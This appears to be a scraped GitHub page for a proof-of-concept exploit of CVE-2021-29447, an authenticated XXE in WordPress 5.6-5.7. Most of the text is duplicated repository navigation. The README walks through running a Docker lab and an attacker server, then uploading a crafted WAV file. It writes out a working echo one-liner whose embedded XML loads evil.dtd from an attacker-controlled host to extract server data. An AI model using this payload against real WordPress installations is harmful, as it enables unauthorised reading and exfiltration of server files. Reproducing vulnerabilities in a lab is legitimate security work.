WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

Using

Step1. Run WordPress

$ make up-wp

Step2. Run Attacker web server

$ make up-mal

Step3. Generate malicious WAV file

Without wavefile npm (Recommend)

$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

With wavefile npm

$ make make-wav

Step4. Login to WordPress & Upload WAV file to New Media

Step5. decode

References

WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8 Security Vulnerability

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
attacker		attacker
.gitignore		.gitignore
Makefile		Makefile
README.md		README.md
docker-compose.yml		docker-compose.yml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

Using

Step1. Run WordPress

Step2. Run Attacker web server

Step3. Generate malicious WAV file

Without wavefile npm (Recommend)

With wavefile npm

Step4. Login to WordPress & Upload WAV file to New Media

Step5. decode

References

About

Languages

motikan2010/CVE-2021-29447

Folders and files

Latest commit

History

Repository files navigation

WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

Using

Step1. Run WordPress

Step2. Run Attacker web server

Step3. Generate malicious WAV file

Without wavefile npm (Recommend)

With wavefile npm

Step4. Login to WordPress & Upload WAV file to New Media

Step5. decode

References

About

Resources

Stars

Watchers

Forks

Languages